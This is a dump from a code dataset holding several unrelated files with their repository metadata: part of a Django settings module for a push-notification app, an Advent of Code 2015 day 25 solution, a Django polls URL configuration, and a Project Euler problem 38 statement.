'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'web_build')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'rn_push_notificatio_27417.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
if env.str("DATABASE_URL", default=None):
DATABASES = {
'default': env.db()
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
MIDDLEWARE += ['whitenoise.middleware.WhiteNoiseMiddleware']
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend'
)
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
STATICFILES_DIRS = [os.path.join(BASE_DIR, 'static'), os.path.join(BASE_DIR, 'web_build/static')]
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
# allauth / users
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_AUTHENTICATION_METHOD = 'email'
ACCOUNT_USERNAME_REQUIRED = False
ACCOUNT_EMAIL_VERIFICATION = "optional"
ACCOUNT_CONFIRM_EMAIL_ON_GET = True
ACCOUNT_LOGIN_ON_EMAIL_CONFIRMATION = True
ACCOUNT_UNIQUE_EMAIL = True
LOGIN_REDIRECT_URL = "users:redirect"
ACCOUNT_ADAPTER = "users.adapters.AccountAdapter"
SOCIALACCOUNT_ADAPTER = "users.adapters.SocialAccountAdapter"
ACCOUNT_ALLOW_REGISTRATION = env.bool("ACCOUNT_ALLOW_REGISTRATION", True)
SOCIALACCOUNT_ALLOW_REGISTRATION = env.bool("SOCIALACCOUNT_ALLOW_REGISTRATION", True)
REST_AUTH_SERIALIZERS = {
# Replace password reset serializer to fix 500 error
"PASSWORD_RESET_SERIALIZER": "home.api.v1.serializers.PasswordSerializer",
}
REST_AUTH_REGISTER_SERIALIZERS = {
# Use custom serializer that has no username and matches web signup
"REGISTER_SERIALIZER": "home.api.v1.serializers.SignupSerializer",
}
# Custom user model
AUTH_USER_MODEL = "users.User"
EMAIL_HOST = env.str("EMAIL_HOST", "smtp.sendgrid.net")
EMAIL_HOST_USER = env.str("SENDGRID_USERNAME", "")
EMAIL_HOST_PASSWORD = env.str("SENDGRID_PASSWORD", "")
EMAIL_PORT = 587
EMAIL_USE_TLS = True
# AWS S3 config
AWS_ACCESS_KEY_ID = env.str("AWS_ACCESS_KEY_ID", "")
AWS_SECRET_ACCESS_KEY = env.str("AWS_SECRET_ACCESS_KEY", "")
AWS_STORAGE_BUCKET_NAME = env.str("AWS_STORAGE_BUCKET_NAME", "")
AWS_STORAGE_REGION = env.str("AWS_STORAGE_REGION", "")
USE_S3 = (
AWS_ACCESS_KEY_ID and
AWS_SECRET_ACCESS_KEY and
AWS_STORAGE_BUCKET_NAME and
AWS_STORAGE_REGION
)
if USE_S3:
AWS_S3_CUSTOM_DOMAIN = env.str("AWS_S3_CUSTOM_DOMAIN", "")
AWS_S3_OBJECT_PARAMETERS = {"CacheControl": "max-age=86400"}
AWS_DEFAULT_ACL = env.str("AWS_DEFAULT_ACL", "public-read")
AWS_MEDIA_LOCATION = env.str("AWS_MEDIA_LOCATION", "media")
AWS_AUTO_CREATE_BUCKET = env.bool("AWS_AUTO_CREATE_BUCKET", True)
DEFAULT_FILE_STORAGE = env.str(
"DEFAULT_FILE_STORAGE", "home.storage_backends.MediaStorage"
)
MEDIA_URL = '/mediafiles/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'mediafiles')
# start fcm_django push notifications
FCM_DJANGO_SETTINGS = {
"FCM_SERVER_KEY": env.str("FCM_SERVER_KEY", "")
}
# end fcm_django push notifications
# Swagger settings for api docs
SWAGGER_SETTINGS = {
"DEFAULT_INFO": f"{ROOT_URLCONF}.api_info",
}
if DEBUG or not (EMAIL_HOST_USER and EMAIL_HOST_PASSWORD):
# output email to console instead of sending
if not DEBUG:
logging.warning("You should setup `SENDGRID_USERNAME` and `SENDGRID_PASSWORD` env vars to send emails.")
EMAIL_BACKEND = "django.core.mail.backends.console.EmailBackend"
| [
"[email protected]"
] | |
919204b02732c69b3cdce838f4f06670d71c72c5 | 5c5e7b03c3373e6217665842f542ca89491290ff | /2015/day25.py | cb3f0bf727f854fd9f2f893b07c4884439f6ee3e | [] | no_license | incnone/AdventOfCode | 9c35214e338e176b6252e52a25a0141a01e290c8 | 29eac5d42403141fccef3c3ddbb986e01c89a593 | refs/heads/master | 2022-12-21T21:54:02.058024 | 2022-12-15T17:33:58 | 2022-12-15T17:33:58 | 229,338,789 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 616 | py | from getinput import get_input
from util import ncr
def get_idx(row, col):
if row == col == 1:
return 1
return ncr(row+col-1, 2) + col
def get_val(row, col):
mod = 33554393
rat = 252533
startval = 20151125
return startval*pow(rat, get_idx(row, col)-1, mod) % mod
def parse_input(s):
words = s.split()
return int(words[-1].rstrip('.')), int(words[-3].rstrip(','))
def part_1(row, col):
return get_val(row, col)
if __name__ == "__main__":
the_col, the_row = parse_input(get_input(25))
print(the_row, the_col)
print('Part 1:', part_1(the_row, the_col))
| [
"[email protected]"
] | |
5bb05fab43f5353a702c4e9a5694f8f08030eda9 | c74f234dc478b49f367106b414df2473ac35b93c | /mysite/polls/urls.py | 5c7dd5797f18fd2607e2b916de5c2ac36d13007c | [] | no_license | Richiewong07/Django | 05994f552cea2cb612c6c1957a0a9a39605fdf5c | 09ac06a60c623d79bb8ecafd014ac7dbc74e8535 | refs/heads/master | 2021-04-15T14:00:00.394201 | 2018-03-24T00:34:15 | 2018-03-24T00:34:15 | 126,238,394 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 591 | py | from django.conf.urls import url
from . import views
urlpatterns = [
# r^$ MEANS DON'T ADD ANYTHING TO OUR URL
# views.index IS WHAT YOU WANT TO DISPLAY
# 127.0.0.1/polls/
url(r'^$', views.index, name="index"),
# SET QUESTION_ID TO A NUMBER
# 127.0.0.1/polls/1
url(r'^(?P<question_id>[0-9]+)/$', views.detail, name="detail"),
# 127.0.0.1/polls/1/results
url(r'^(?P<question_id>[0-9]+)/results$', views.results, name="results"),
# 127.0.0.1/polls/1/votes
url(r'^(?P<question_id>[0-9]+)/vote$', views.vote, name="vote"),
]
app_name = 'polls' | [
"[email protected]"
] | |
7b76e148b73b644e42f7a1abb259e77dad11fdcc | 4f4c2e5a8a71a2058069b90eb75e11b1ec80efa9 | /euler/Problem_38-Pandigital_multiples.py | 3b25e4c08a2411b5567f23fe50c40e8e254addf0 | [] | no_license | mingyyy/dataquest_projects | 20e234f1d0d3dd8be1f0202b7ed3bce172474e38 | 885ffe4338300cb9c295f37f6140c50ff3b72186 | refs/heads/master | 2022-12-11T17:25:44.053404 | 2020-01-10T09:24:28 | 2020-01-10T09:24:28 | 190,170,724 | 0 | 0 | null | 2022-12-08T05:55:21 | 2019-06-04T09:29:53 | Jupyter Notebook | UTF-8 | Python | false | false | 525 | py | """
Take the number 192 and multiply it by each of 1, 2, and 3:
By concatenating each product we get the 1 to 9 pandigital, 192384576. We will call 192384576 the concatenated product of 192 and (1,2,3)
The same can be achieved by starting with 9 and multiplying by 1, 2, 3, 4, and 5, giving the pandigital, 918273645, which is the concatenated product of 9 and (1,2,3,4,5).
What is the largest 1 to 9 pandigital 9-digit number that can be formed as the concatenated product of an integer with (1,2, ... , n) where n > 1?
""" | [
"[email protected]"
] |
Subsets and Splits
No saved queries yet
Save your SQL queries to embed, download, and access them later. Queries will appear here once saved.